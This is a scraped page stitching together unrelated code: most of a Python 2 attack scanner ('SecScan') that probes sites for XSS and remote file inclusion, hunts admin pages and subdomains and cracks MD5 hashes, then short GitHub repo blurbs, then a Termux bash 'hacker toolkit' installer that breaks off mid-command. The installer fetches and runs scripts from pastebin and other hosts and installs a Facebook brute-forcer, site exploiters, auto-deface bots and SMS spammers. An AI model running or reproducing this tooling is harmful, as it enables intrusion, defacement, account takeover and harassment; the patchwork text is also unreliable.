urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nm0le@tormail.org\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main()
kriventsov / Clarke And Parkes Error GridsPython Implementation of Clarke and Parkes Error Grids for Blood Glucose Accuracy Analysis
qec-codes / QecPython Tools for Quantum Error Correction
morganholland / Logseq To Obsidian MigrationA Python script to migrate Logseq graphs to Obsidian format with enhanced features and robust error handling
HasData / Cloudflare BypassThis repository provides minimal working examples for bypassing Cloudflare 1020 errors using Playwright in both Python and Node.js. The focus is on showing basic setups to load pages that are often protected by anti-bot measures, with step-by-step improvements like stealth plugins, proxy rotation, and human-like behaviors.
analyticsinmotion / Werpy🐍📦 Ultra-fast Python package for calculating and analyzing the Word Error Rate (WER). Built for the scalable evaluation of speech and transcription accuracy.
Nishant-Wadhwani / Intelligent Infotainment System For Automobiles# Intellifotainment assist” – Smart HMI for passenger cars To run the program, download all files and save them in the same directory. After that, simply run 'Master.py' in the terminal. At the moment, the program will only run in linux based systems. # The Idea Infotainment systems have come a long way since the first set of dashboards installed in cars. Through our idea, we aim to create a Human Machine interaction model that takes infotainment systems to a new level. The driver tends to get distracted from the road while performing secondary tasks such as changing the music track, locking/unlocking the door while driving etc. Our system shall enable the driver to focus only on driving. Controlling the secondary tasks will be much easier. Our product primarily comprises of 5 modules: 1) Attention and drowsiness detection: - A camera shall be present on the dashboard, in front of the driver, behind the steering wheel. Through digital image processing techniques , using hough circle algorithm and haarcascade of an eye, we shall keep track of the driver’s sight. If he or she is looking away from the road while driving for more than a specified amount of time, we shall alert the driver to focus. We shall map the head orientation and iris position to accurately identify the driver’s attention. 2) Infotainment control features using blink combination: Through a combination of blinks, the driver can turn on or of the headlights, tail lights as well as indicators. Blinking of the eyes shall be detected using ‘dlib’ features in python. This shall give extremely accurate results. 3) Voice commands to control wipers, car lock, music system and windows A simple, yet extremely useful idea that would make the life of the driver a whole lot easy. Enabling the driver to speak to his car infotainment system would allow him to control and navigate these functionalities with great ease. The car will be enabled with a virtual assistant. 4) Automatic rear view mirror adjustment scheme: Using the camera placed in front of the driver, the system shall detect the position of the driver’s head. This shall also be done using image processing techniques and we shall identify the coordinates of the driver head in 3D space. There will be a mapping between the head position and mirror adjustment scheme. The mirrors will adjust their position using servo motors and shall do so automatically by identifying the head position. 5) A revolutionary reverse-assistance algorithm for smart parking and general reversing: Probably the highlight of our model, this feature shall make driving the car in and out of a parking spot, or rather, even reversing a car in general, far easier and safer than what it already is. Like most other modern cars, our model shall also have a camera installed at the back and the corresponding image displayed at the infotainment screen for parking assistance. Upon activating the reverse gear, the screen shall trace the line of motion of the car corresponding to the current position of the steering wheel. Because of this feature, the driver gets an idea of whether or not he’ll hit an obstacle while reversing if the steering wheel is kept at that position. Taking this feature to another level, the rear camera, after capturing the live video feed from the back of the car, shall perform image processing and machine learning algorithms to find a safe, obstacle-free path for reversing and indicate the driver to move the steering wheel accordingly. So instead of relying solely on the drivers judgement, our system shall actually find the path to be taken while reversing, such that other cars and other obstacles will be avoided, and accordingly recommend the driver to steer the wheel in that direction. This feature shall be extremely useful for new drivers/ learners. During the initial phase, to prevent errors from creeping in, we will always have a manual override button. After a good amount of testing, further modifications and refinements can be made. Our systems adds new dimensions to both precautionary safety measures, as well as convenience. If implemented properly, we are confident that our project will reach new heights of HMI and driver assistance technology. It will give drivers several less reasons to worry about.
mamahsayang / Yan#!/data/data/com.termux/files/usr/bin/bash # DIAN HERMAWAN # coded By MASTER HACKER # copyright® 2019 # WELCOME blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> Terima kasih sudah make tools saya ... " sleep 1 echo "" echo -e $white"[#]> Master Here ... " read enter exit } echo -e $red" __ ___ _____ __ _ __" echo -e $red" / |/ /___ / ___/__ _/ /__ (_) /" echo -e $white" / /|_/ / __// /__/ _ / _// / / " echo -e $white" /_/ /_/_/ (_)___/\_,_/_/\_\/_/_/ " echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: mrcakil@programmer.net $white #" echo -e $red" # $white greetz :99syndicate - Anonymous Cyber team $red#" echo -e $white" # $white copyright : ./Mr Cakil $white #" echo -e $red" # $white thanks to : 4wsec - Mr.Tenwap $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) Youtube Dl" echo -e $green" 10) viSQL " echo -e $green" 11) Weeman" echo -e $green" 12) WFDroid" echo -e $green" 13) FBBrute" echo -e $green" 14) Ngrok" echo -e $green" 15) Torshammer " echo -e $green" 16) RouterSploit " echo -e $green" 17) Hydra " echo -e $green" 18) Weevely " echo -e $green" 19) SQLMap " echo -e $green" 20) Dirbuster " echo -e $green" 21) admin finder " echo -e $green" 22) lokomedia exploiter " echo -e $green" 23) elfinder exploiter " echo -e $green" 24) magento add admin exploiter " echo -e $green" 25) scanner tools " echo -e $green" 26) bing dorker " echo -e $green" 27) katoolin " echo -e $green" 28) arch linux " echo -e $green" 29) linux fedora" echo -e $green" 30) hash-buster" echo -e $green" 31) sudo" echo -e $green" 32) aircrack-ng" echo -e $green" 33) joomscan" echo -e $green" 34) bing-ip2hosts" echo -e $green" 35) BlueMaho" echo -e $green" 36) Bluepot" echo -e $green" 37) honeypot" echo -e $green" 38) bot auto deface 1" echo -e $green" 39) bot auto deface 2" echo -e $green" 40) mailer sender cli" echo -e $green" 41) Wordpress Brute Force" echo -e $green" 42) Oh-myzsh theme for termux" echo -e $green" 43) instabot (instagram bot)" echo -e $green" 44) fsociety" echo -e $green" 45) Cms Scanner" echo -e $green" 46) Information Gathering" echo -e $green" 47) com_fabrik exploiter" echo -e $green" 48) com foxcontact exploiter" echo -e $green" 49) gmail brute force" echo -e $green" 50) ezsploit" echo -e $green" 51) spammer-grab sms" echo -e $green" 52) spammer call toko-pedia" echo -e $green" 53) The Fat Rat" echo -e $green" 54) IPGeolocation" echo -e $green" 55) exit" echo -e $white"" read -p "[mrcakil@Tools]> " act; if [ $act = 01 ] || [ $act = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $green" Done Install Cuk " fi if [ $act = 02 ] || [ $act = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" Done Install Cuk " fi if [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install Cuk " fi if [ $act = 04 ] || [ $act = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 05 ] || [ $act = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 06 ] || [ $act = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Done Install Cuk " fi if [ $act = 07 ] || [ $act = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" Done Install Cuk " fi if [ $act = 08 ] || [ $act = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Done Install Cuk " fi if [ $act = 09 ] || [ $act = 09 ] then clear echo -e $green" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo -e $red" Done Install Cuk " fi if [ $act = 10 ] || [ $act = 10 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 11 ] || [ $act = 11 ] then clear echo -e $green" Installing Weeman " sleep 1 apt update && apt upgrade pkg install git apt install python2 git clone https://github.com/samyoyo/weeman cd ~/weeman pip2 install beautifulsoup pip2 install bs4 cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 12 ] || [ $act = 12 ] then clear echo -e $green" Installing WFDroid " sleep 1 apt update && apt upgrade apt install wget mkdir wfdroid cd ~/wfdroid wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstall chmod 777 wfdinstall sh wfdinstall cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 13 ] || [ $act = 13 ] then clear sleep 1 echo -e $green" Installing FBBrute " apt install python2 apt install python2-dev apt install wget pip2 install mechanize mkdir fbbrute cd ~/fbbrute wget https://pastebin.com/raw/aqMBt2xA -O fbbrute.py wget http://override.waper.co/files/password.apk mv password.apk password.txt chmod 777 fbbrute.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 14 ] || [ $act = 14 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 15 ] || [ $act = 15 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 16 ] || [ $act = 16 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 17 ] || [ $act = 17 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 18 ] || [ $act = 18 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 19 ] || [ $act = 19 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 20 ] || [ $act = 20 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 21 ] || [ $act = 21 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 22 ] || [ $act = 22 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $act = 23 ] || [ $act = 23 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 24 ] || [ $act = 24 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 25 ] || [ $act = 25 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python2 mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $act = 26 ] || [ $act = 26 ] then clear echo -e $green" installing bing dorker " sleep 1 apt update && apt upgrade apt-get install php mkdir bing cd ~/bing wget https://pastebin.com/raw/tjQY6Tsg -O dorker.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 27 ] || [ $act = 27 ] then clear echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python2 pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install Cuk " fi if [ $act = 28 ] || [ $act = 28 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh 